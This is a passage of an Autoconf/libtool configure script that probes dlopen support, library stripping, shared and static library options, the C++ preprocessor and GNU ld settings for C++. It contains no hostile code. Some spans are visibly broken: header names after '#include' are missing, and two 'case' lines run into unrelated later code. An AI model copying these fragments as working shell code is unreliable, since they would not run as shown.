"$dynamic_linker" >&6; } test no = "$dynamic_linker" && can_build_shared=no variables_saved_for_relink="PATH $shlibpath_var $runpath_var" if test yes = "$GCC"; then variables_saved_for_relink="$variables_saved_for_relink GCC_EXEC_PREFIX COMPILER_PATH LIBRARY_PATH" fi if test set = "${lt_cv_sys_lib_search_path_spec+set}"; then sys_lib_search_path_spec=$lt_cv_sys_lib_search_path_spec fi if test set = "${lt_cv_sys_lib_dlsearch_path_spec+set}"; then sys_lib_dlsearch_path_spec=$lt_cv_sys_lib_dlsearch_path_spec fi # remember unaugmented sys_lib_dlsearch_path content for libtool script decls... configure_time_dlsearch_path=$sys_lib_dlsearch_path_spec # ... but it needs LT_SYS_LIBRARY_PATH munging for other configure-time code func_munge_path_list sys_lib_dlsearch_path_spec "$LT_SYS_LIBRARY_PATH" # to be used as default LT_SYS_LIBRARY_PATH value in generated libtool configure_time_lt_sys_library_path=$LT_SYS_LIBRARY_PATH { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to hardcode library paths into programs" >&5 $as_echo_n "checking how to hardcode library paths into programs... " >&6; } hardcode_action= if test -n "$hardcode_libdir_flag_spec" || test -n "$runpath_var" || test yes = "$hardcode_automatic"; then # We can hardcode non-existent directories. if test no != "$hardcode_direct" && # If the only mechanism to avoid hardcoding is shlibpath_var, we # have to relink, otherwise we might link with an installed library # when we should be linking with a yet-to-be-installed one ## test no != "$_LT_TAGVAR(hardcode_shlibpath_var, )" && test no != "$hardcode_minus_L"; then # Linking always hardcodes the temporary library directory. hardcode_action=relink else # We can link without hardcoding, and we can hardcode nonexisting dirs. hardcode_action=immediate fi else # We cannot hardcode anything, or else we can only hardcode existing # directories. hardcode_action=unsupported fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $hardcode_action" >&5 $as_echo "$hardcode_action" >&6; } if test relink = "$hardcode_action" || test yes = "$inherit_rpath"; then # Fast installation is not supported enable_fast_install=no elif test yes = "$shlibpath_overrides_runpath" || test no = "$enable_shared"; then # Fast installation is not necessary enable_fast_install=needless fi if test yes != "$enable_dlopen"; then enable_dlopen=unknown enable_dlopen_self=unknown enable_dlopen_self_static=unknown else lt_cv_dlopen=no lt_cv_dlopen_libs= case $host_os in beos*) lt_cv_dlopen=load_add_on lt_cv_dlopen_libs= lt_cv_dlopen_self=yes ;; mingw* | pw32* | cegcc*) lt_cv_dlopen=LoadLibrary lt_cv_dlopen_libs= ;; cygwin*) lt_cv_dlopen=dlopen lt_cv_dlopen_libs= ;; darwin*) # if libdl is installed we need to link against it { $as_echo "$as_me:${as_lineno-$LINENO}: checking for dlopen in -ldl" >&5 $as_echo_n "checking for dlopen in -ldl... " >&6; } if ${ac_cv_lib_dl_dlopen+:} false; then : $as_echo_n "(cached) " >&6 else ac_check_lib_save_LIBS=$LIBS LIBS="-ldl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char dlopen (); int main () { return dlopen (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_dl_dlopen=yes else ac_cv_lib_dl_dlopen=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dl_dlopen" >&5 $as_echo "$ac_cv_lib_dl_dlopen" >&6; } if test "x$ac_cv_lib_dl_dlopen" = xyes; then : lt_cv_dlopen=dlopen lt_cv_dlopen_libs=-ldl else lt_cv_dlopen=dyld lt_cv_dlopen_libs= lt_cv_dlopen_self=yes fi ;; tpf*) # Don't try to run any link tests for TPF. We know it's impossible # because TPF is a cross-compiler, and we know how we open DSOs. lt_cv_dlopen=dlopen lt_cv_dlopen_libs= lt_cv_dlopen_self=no ;; *) ac_fn_c_check_func "$LINENO" "shl_load" "ac_cv_func_shl_load" if test "x$ac_cv_func_shl_load" = xyes; then : lt_cv_dlopen=shl_load else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for shl_load in -ldld" >&5 $as_echo_n "checking for shl_load in -ldld... " >&6; } if ${ac_cv_lib_dld_shl_load+:} false; then : $as_echo_n "(cached) " >&6 else ac_check_lib_save_LIBS=$LIBS LIBS="-ldld $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char shl_load (); int main () { return shl_load (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_dld_shl_load=yes else ac_cv_lib_dld_shl_load=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dld_shl_load" >&5 $as_echo "$ac_cv_lib_dld_shl_load" >&6; } if test "x$ac_cv_lib_dld_shl_load" = xyes; then : lt_cv_dlopen=shl_load lt_cv_dlopen_libs=-ldld else ac_fn_c_check_func "$LINENO" "dlopen" "ac_cv_func_dlopen" if test "x$ac_cv_func_dlopen" = xyes; then : lt_cv_dlopen=dlopen else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for dlopen in -ldl" >&5 $as_echo_n "checking for dlopen in -ldl... " >&6; } if ${ac_cv_lib_dl_dlopen+:} false; then : $as_echo_n "(cached) " >&6 else ac_check_lib_save_LIBS=$LIBS LIBS="-ldl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char dlopen (); int main () { return dlopen (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_dl_dlopen=yes else ac_cv_lib_dl_dlopen=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dl_dlopen" >&5 $as_echo "$ac_cv_lib_dl_dlopen" >&6; } if test "x$ac_cv_lib_dl_dlopen" = xyes; then : lt_cv_dlopen=dlopen lt_cv_dlopen_libs=-ldl else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for dlopen in -lsvld" >&5 $as_echo_n "checking for dlopen in -lsvld... " >&6; } if ${ac_cv_lib_svld_dlopen+:} false; then : $as_echo_n "(cached) " >&6 else ac_check_lib_save_LIBS=$LIBS LIBS="-lsvld $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char dlopen (); int main () { return dlopen (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_svld_dlopen=yes else ac_cv_lib_svld_dlopen=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_svld_dlopen" >&5 $as_echo "$ac_cv_lib_svld_dlopen" >&6; } if test "x$ac_cv_lib_svld_dlopen" = xyes; then : lt_cv_dlopen=dlopen lt_cv_dlopen_libs=-lsvld else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for dld_link in -ldld" >&5 $as_echo_n "checking for dld_link in -ldld... " >&6; } if ${ac_cv_lib_dld_dld_link+:} false; then : $as_echo_n "(cached) " >&6 else ac_check_lib_save_LIBS=$LIBS LIBS="-ldld $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char dld_link (); int main () { return dld_link (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_dld_dld_link=yes else ac_cv_lib_dld_dld_link=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dld_dld_link" >&5 $as_echo "$ac_cv_lib_dld_dld_link" >&6; } if test "x$ac_cv_lib_dld_dld_link" = xyes; then : lt_cv_dlopen=dld_link lt_cv_dlopen_libs=-ldld fi fi fi fi fi fi ;; esac if test no = "$lt_cv_dlopen"; then enable_dlopen=no else enable_dlopen=yes fi case $lt_cv_dlopen in dlopen) save_CPPFLAGS=$CPPFLAGS test yes = "$ac_cv_header_dlfcn_h" && CPPFLAGS="$CPPFLAGS -DHAVE_DLFCN_H" save_LDFLAGS=$LDFLAGS wl=$lt_prog_compiler_wl eval LDFLAGS=\"\$LDFLAGS $export_dynamic_flag_spec\" save_LIBS=$LIBS LIBS="$lt_cv_dlopen_libs $LIBS" { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether a program can dlopen itself" >&5 $as_echo_n "checking whether a program can dlopen itself... " >&6; } if ${lt_cv_dlopen_self+:} false; then : $as_echo_n "(cached) " >&6 else if test yes = "$cross_compiling"; then : lt_cv_dlopen_self=cross else lt_dlunknown=0; lt_dlno_uscore=1; lt_dlneed_uscore=2 lt_status=$lt_dlunknown cat > conftest.$ac_ext <<_LT_EOF #line $LINENO "configure" #include "confdefs.h" #if HAVE_DLFCN_H #include #endif #include #ifdef RTLD_GLOBAL # define LT_DLGLOBAL RTLD_GLOBAL #else # ifdef DL_GLOBAL # define LT_DLGLOBAL DL_GLOBAL # else # define LT_DLGLOBAL 0 # endif #endif /* We may have to define LT_DLLAZY_OR_NOW in the command line if we find out it does not work in some platform. */ #ifndef LT_DLLAZY_OR_NOW # ifdef RTLD_LAZY # define LT_DLLAZY_OR_NOW RTLD_LAZY # else # ifdef DL_LAZY # define LT_DLLAZY_OR_NOW DL_LAZY # else # ifdef RTLD_NOW # define LT_DLLAZY_OR_NOW RTLD_NOW # else # ifdef DL_NOW # define LT_DLLAZY_OR_NOW DL_NOW # else # define LT_DLLAZY_OR_NOW 0 # endif # endif # endif # endif #endif /* When -fvisibility=hidden is used, assume the code has been annotated correspondingly for the symbols needed. */ #if defined __GNUC__ && (((__GNUC__ == 3) && (__GNUC_MINOR__ >= 3)) || (__GNUC__ > 3)) int fnord () __attribute__((visibility("default"))); #endif int fnord () { return 42; } int main () { void *self = dlopen (0, LT_DLGLOBAL|LT_DLLAZY_OR_NOW); int status = $lt_dlunknown; if (self) { if (dlsym (self,"fnord")) status = $lt_dlno_uscore; else { if (dlsym( self,"_fnord")) status = $lt_dlneed_uscore; else puts (dlerror ()); } /* dlclose (self); */ } else puts (dlerror ()); return status; } _LT_EOF if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_link\""; } >&5 (eval $ac_link) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && test -s "conftest$ac_exeext" 2>/dev/null; then (./conftest; exit; ) >&5 2>/dev/null lt_status=$? case x$lt_status in x$lt_dlno_uscore) lt_cv_dlopen_self=yes ;; x$lt_dlneed_uscore) lt_cv_dlopen_self=yes ;; x$lt_dlunknown|x*) lt_cv_dlopen_self=no ;; esac else : # compilation failed lt_cv_dlopen_self=no fi fi rm -fr conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_dlopen_self" >&5 $as_echo "$lt_cv_dlopen_self" >&6; } if test yes = "$lt_cv_dlopen_self"; then wl=$lt_prog_compiler_wl eval LDFLAGS=\"\$LDFLAGS $lt_prog_compiler_static\" { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether a statically linked program can dlopen itself" >&5 $as_echo_n "checking whether a statically linked program can dlopen itself... " >&6; } if ${lt_cv_dlopen_self_static+:} false; then : $as_echo_n "(cached) " >&6 else if test yes = "$cross_compiling"; then : lt_cv_dlopen_self_static=cross else lt_dlunknown=0; lt_dlno_uscore=1; lt_dlneed_uscore=2 lt_status=$lt_dlunknown cat > conftest.$ac_ext <<_LT_EOF #line $LINENO "configure" #include "confdefs.h" #if HAVE_DLFCN_H #include #endif #include #ifdef RTLD_GLOBAL # define LT_DLGLOBAL RTLD_GLOBAL #else # ifdef DL_GLOBAL # define LT_DLGLOBAL DL_GLOBAL # else # define LT_DLGLOBAL 0 # endif #endif /* We may have to define LT_DLLAZY_OR_NOW in the command line if we find out it does not work in some platform. */ #ifndef LT_DLLAZY_OR_NOW # ifdef RTLD_LAZY # define LT_DLLAZY_OR_NOW RTLD_LAZY # else # ifdef DL_LAZY # define LT_DLLAZY_OR_NOW DL_LAZY # else # ifdef RTLD_NOW # define LT_DLLAZY_OR_NOW RTLD_NOW # else # ifdef DL_NOW # define LT_DLLAZY_OR_NOW DL_NOW # else # define LT_DLLAZY_OR_NOW 0 # endif # endif # endif # endif #endif /* When -fvisibility=hidden is used, assume the code has been annotated correspondingly for the symbols needed. */ #if defined __GNUC__ && (((__GNUC__ == 3) && (__GNUC_MINOR__ >= 3)) || (__GNUC__ > 3)) int fnord () __attribute__((visibility("default"))); #endif int fnord () { return 42; } int main () { void *self = dlopen (0, LT_DLGLOBAL|LT_DLLAZY_OR_NOW); int status = $lt_dlunknown; if (self) { if (dlsym (self,"fnord")) status = $lt_dlno_uscore; else { if (dlsym( self,"_fnord")) status = $lt_dlneed_uscore; else puts (dlerror ()); } /* dlclose (self); */ } else puts (dlerror ()); return status; } _LT_EOF if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_link\""; } >&5 (eval $ac_link) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && test -s "conftest$ac_exeext" 2>/dev/null; then (./conftest; exit; ) >&5 2>/dev/null lt_status=$? case x$lt_status in x$lt_dlno_uscore) lt_cv_dlopen_self_static=yes ;; x$lt_dlneed_uscore) lt_cv_dlopen_self_static=yes ;; x$lt_dlunknown|x*) lt_cv_dlopen_self_static=no ;; esac else : # compilation failed lt_cv_dlopen_self_static=no fi fi rm -fr conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_dlopen_self_static" >&5 $as_echo "$lt_cv_dlopen_self_static" >&6; } fi CPPFLAGS=$save_CPPFLAGS LDFLAGS=$save_LDFLAGS LIBS=$save_LIBS ;; esac case $lt_cv_dlopen_self in yes|no) enable_dlopen_self=$lt_cv_dlopen_self ;; *) enable_dlopen_self=unknown ;; esac case $lt_cv_dlopen_self_static in yes|no) enable_dlopen_self_static=$lt_cv_dlopen_self_static ;; *) enable_dlopen_self_static=unknown ;; esac fi striplib= old_striplib= { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether stripping libraries is possible" >&5 $as_echo_n "checking whether stripping libraries is possible... " >&6; } if test -z "$STRIP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } else if $STRIP -V 2>&1 | $GREP "GNU strip" >/dev/null; then old_striplib="$STRIP --strip-debug" striplib="$STRIP --strip-unneeded" { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } else case $host_os in darwin*) # FIXME - insert some real tests, host_os isn't really good enough striplib="$STRIP -x" old_striplib="$STRIP -S" { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } ;; freebsd*) if $STRIP -V 2>&1 | $GREP "elftoolchain" >/dev/null; then old_striplib="$STRIP --strip-debug" striplib="$STRIP --strip-unneeded" { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi ;; *) { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } ;; esac fi fi # Report what library types will actually be built { $as_echo "$as_me:${as_lineno-$LINENO}: checking if libtool supports shared libraries" >&5 $as_echo_n "checking if libtool supports shared libraries... " >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: result: $can_build_shared" >&5 $as_echo "$can_build_shared" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether to build shared libraries" >&5 $as_echo_n "checking whether to build shared libraries... " >&6; } test no = "$can_build_shared" && enable_shared=no # On AIX, shared libraries and static libraries use the same namespace, and # are all built from PIC. case $host_os in aix3*) test yes = "$enable_shared" && enable_static=no if test -n "$RANLIB"; then archive_cmds="$archive_cmds~\$RANLIB \$lib" postinstall_cmds='$RANLIB $lib' fi ;; aix[4-9]*) if test ia64 != "$host_cpu"; then case $enable_shared,$with_aix_soname,$aix_use_runtimelinking in yes,aix,yes) ;; # shared object as lib.so file only yes,svr4,*) ;; # shared object as lib.so archive member only yes,*) enable_static=no ;; # shared object in lib.a archive as well esac fi ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: $enable_shared" >&5 $as_echo "$enable_shared" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether to build static libraries" >&5 $as_echo_n "checking whether to build static libraries... " >&6; } # Make sure either enable_shared or enable_static is yes. test yes = "$enable_shared" || enable_static=yes { $as_echo "$as_me:${as_lineno-$LINENO}: result: $enable_static" >&5 $as_echo "$enable_static" >&6; } fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu CC=$lt_save_CC if test -n "$CXX" && ( test no != "$CXX" && ( (test g++ = "$CXX" && `g++ -v >/dev/null 2>&1` ) || (test g++ != "$CXX"))); then ac_ext=cpp ac_cpp='$CXXCPP $CPPFLAGS' ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_cxx_compiler_gnu { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to run the C++ preprocessor" >&5 $as_echo_n "checking how to run the C++ preprocessor... " >&6; } if test -z "$CXXCPP"; then if ${ac_cv_prog_CXXCPP+:} false; then : $as_echo_n "(cached) " >&6 else # Double quotes because CXXCPP needs to be expanded for CXXCPP in "$CXX -E" "/lib/cpp" do ac_preproc_ok=false for ac_cxx_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # Prefer to if __STDC__ is defined, since # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include #else # include #endif Syntax error _ACEOF if ac_fn_cxx_try_cpp "$LINENO"; then : else # Broken: fails on valid input. continue fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_cxx_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else # Passes both tests. ac_preproc_ok=: break fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok; then : break fi done ac_cv_prog_CXXCPP=$CXXCPP fi CXXCPP=$ac_cv_prog_CXXCPP else ac_cv_prog_CXXCPP=$CXXCPP fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CXXCPP" >&5 $as_echo "$CXXCPP" >&6; } ac_preproc_ok=false for ac_cxx_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # Prefer to if __STDC__ is defined, since # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include #else # include #endif Syntax error _ACEOF if ac_fn_cxx_try_cpp "$LINENO"; then : else # Broken: fails on valid input. continue fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_cxx_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else # Passes both tests. ac_preproc_ok=: break fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok; then : else { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "C++ preprocessor \"$CXXCPP\" fails sanity check See \`config.log' for more details" "$LINENO" 5; } fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu else _lt_caught_CXX_error=yes fi ac_ext=cpp ac_cpp='$CXXCPP $CPPFLAGS' ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_cxx_compiler_gnu archive_cmds_need_lc_CXX=no allow_undefined_flag_CXX= always_export_symbols_CXX=no archive_expsym_cmds_CXX= compiler_needs_object_CXX=no export_dynamic_flag_spec_CXX= hardcode_direct_CXX=no hardcode_direct_absolute_CXX=no hardcode_libdir_flag_spec_CXX= hardcode_libdir_separator_CXX= hardcode_minus_L_CXX=no hardcode_shlibpath_var_CXX=unsupported hardcode_automatic_CXX=no inherit_rpath_CXX=no module_cmds_CXX= module_expsym_cmds_CXX= link_all_deplibs_CXX=unknown old_archive_cmds_CXX=$old_archive_cmds reload_flag_CXX=$reload_flag reload_cmds_CXX=$reload_cmds no_undefined_flag_CXX= whole_archive_flag_spec_CXX= enable_shared_with_static_runtimes_CXX=no # Source file extension for C++ test sources. ac_ext=cpp # Object file extension for compiled C++ test sources. objext=o objext_CXX=$objext # No sense in running all these tests if we already determined that # the CXX compiler isn't working. Some variables (like enable_shared) # are currently assumed to apply to all compilers on this platform, # and will be corrupted by setting them based on a non-working compiler. if test yes != "$_lt_caught_CXX_error"; then # Code to be used in simple compile tests lt_simple_compile_test_code="int some_variable = 0;" # Code to be used in simple link tests lt_simple_link_test_code='int main(int, char *[]) { return(0); }' # ltmain only uses $CC for tagged configurations so make sure $CC is set. # If no C compiler was specified, use CC. LTCC=${LTCC-"$CC"} # If no C compiler flags were specified, use CFLAGS. LTCFLAGS=${LTCFLAGS-"$CFLAGS"} # Allow CC to be a program name with arguments. compiler=$CC # save warnings/boilerplate of simple test code ac_outfile=conftest.$ac_objext echo "$lt_simple_compile_test_code" >conftest.$ac_ext eval "$ac_compile" 2>&1 >/dev/null | $SED '/^$/d; /^ *+/d' >conftest.err _lt_compiler_boilerplate=`cat conftest.err` $RM conftest* ac_outfile=conftest.$ac_objext echo "$lt_simple_link_test_code" >conftest.$ac_ext eval "$ac_link" 2>&1 >/dev/null | $SED '/^$/d; /^ *+/d' >conftest.err _lt_linker_boilerplate=`cat conftest.err` $RM -r conftest* # Allow CC to be a program name with arguments. lt_save_CC=$CC lt_save_CFLAGS=$CFLAGS lt_save_LD=$LD lt_save_GCC=$GCC GCC=$GXX lt_save_with_gnu_ld=$with_gnu_ld lt_save_path_LD=$lt_cv_path_LD if test -n "${lt_cv_prog_gnu_ldcxx+set}"; then lt_cv_prog_gnu_ld=$lt_cv_prog_gnu_ldcxx else $as_unset lt_cv_prog_gnu_ld fi if test -n "${lt_cv_path_LDCXX+set}"; then lt_cv_path_LD=$lt_cv_path_LDCXX else $as_unset lt_cv_path_LD fi test -z "${LDCXX+set}" || LD=$LDCXX CC=${CXX-"c++"} CFLAGS=$CXXFLAGS compiler=$CC compiler_CXX=$CC func_cc_basename $compiler cc_basename=$func_cc_basename_result if test -n "$compiler"; then # We don't want -fno-exception when compiling C++ code, so set the # no_builtin_flag separately if test yes = "$GXX"; then lt_prog_compiler_no_builtin_flag_CXX=' -fno-builtin' else lt_prog_compiler_no_builtin_flag_CXX= fi if test yes = "$GXX"; then # Set up default GNU C++ configuration # Check whether --with-gnu-ld was given. if test "${with_gnu_ld+set}" = set; then : withval=$with_gnu_ld; test no = "$withval" || with_gnu_ld=yes else with_gnu_ld=no fi ac_prog=ld if test yes = "$GCC"; then # Check if gcc -print-prog-name=ld gives a path. { $as_echo "$as_me:${as_lineno-$LINENO}: checking for ld used by $CC" >&5 $as_echo_n "checking for ld used by $CC... " >&6; } case $host in *-*-mingw*) # gcc leaves a trailing carriage return, which upsets mingw ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;; *) ac_prog=`($CC -print-prog-name=ld) 2>&5` ;; esac case $ac_prog in # Accept absolute paths. [\\/]* | ?:[\\/]*) re_direlt='/[^/][^/]*/\.\./' # Canonicalize the pathname of ld ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'` while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"` done test -z "$LD" && LD=$ac_prog ;; "") # If it fails, then pretend we aren't using GCC. ac_prog=ld ;; *) # If it is relative, then search for the first ld in PATH. with_gnu_ld=unknown ;; esac elif test yes = "$with_gnu_ld"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking for GNU ld" >&5 $as_echo_n "checking for GNU ld... " >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for non-GNU ld" >&5 $as_echo_n "checking for non-GNU ld... " >&6; } fi if ${lt_cv_path_LD+:} false; then : $as_echo_n "(cached) " >&6 else if test -z "$LD"; then lt_save_ifs=$IFS; IFS=$PATH_SEPARATOR for ac_dir in $PATH; do IFS=$lt_save_ifs test -z "$ac_dir" && ac_dir=. if test -f "$ac_dir/$ac_prog" || test -f "$ac_dir/$ac_prog$ac_exeext"; then lt_cv_path_LD=$ac_dir/$ac_prog # Check to see if the program is GNU ld. I'd rather use --version, # but apparently some variants of GNU ld only accept -v. # Break only if it was the GNU/non-GNU ld that we prefer. case `"$lt_cv_path_LD" -v 2>&1 &5 $as_echo "$LD" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -z "$LD" && as_fn_error $? "no acceptable ld found in \$PATH" "$LINENO" 5 { $as_echo "$as_me:${as_lineno-$LINENO}: checking if the linker ($LD) is GNU ld" >&5 $as_echo_n "checking if the linker ($LD) is GNU ld... " >&6; } if ${lt_cv_prog_gnu_ld+:} false; then : $as_echo_n "(cached) " >&6 else # I'd rather use --version here, but apparently some GNU lds only accept -v. case `$LD -v 2>&1 &5 $as_echo "$lt_cv_prog_gnu_ld" >&6; } with_gnu_ld=$lt_cv_prog_gnu_ld # Check if GNU C++ uses GNU ld as the underlying linker, since the # archiving commands below assume that GNU ld is being used. if test yes = "$with_gnu_ld"; then archive_cmds_CXX='$CC $pic_flag -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds_CXX='$CC $pic_flag -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib' hardcode_libdir_flag_spec_CXX='$wl-rpath $wl$libdir' export_dynamic_flag_spec_CXX='$wl--export-dynamic' # If archive_cmds runs LD, not CC, wlarc should be empty # XXX I think wlarc can be eliminated in ltcf-cxx, but I need to # investigate it a little bit more. (MM) wlarc='$wl' # ancient GNU ld didn't support --whole-archive et. al. if eval "`$CC -print-prog-name=ld` --help 2>&1" | $GREP 'no-whole-archive' > /dev/null; then whole_archive_flag_spec_CXX=$wlarc'--whole-archive$convenience '$wlarc'--no-whole-archive' else whole_archive_flag_spec_CXX= fi else with_gnu_ld=no wlarc= # A generic and very simple default shared library creation # command for GNU C++ for the case where it uses the native # linker, instead of GNU ld. If possible, this setting should # overridden to take advantage of the native linker features on # the platform it is being used on. archive_cmds_CXX='$CC -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -o $lib' fi # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. output_verbose_link_cmd='$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP -v "^Configured with:" | $GREP "\-L"' else GXX=no with_gnu_ld=no wlarc= fi # PORTME: fill in a description of your system's C++ link characteristics { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the $compiler linker ($LD) supports shared libraries" >&5 $as_echo_n "checking whether the $compiler linker ($LD) supports shared libraries... " >&6; } ld_shlibs_CXX=yes case $host_os in aix3*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; 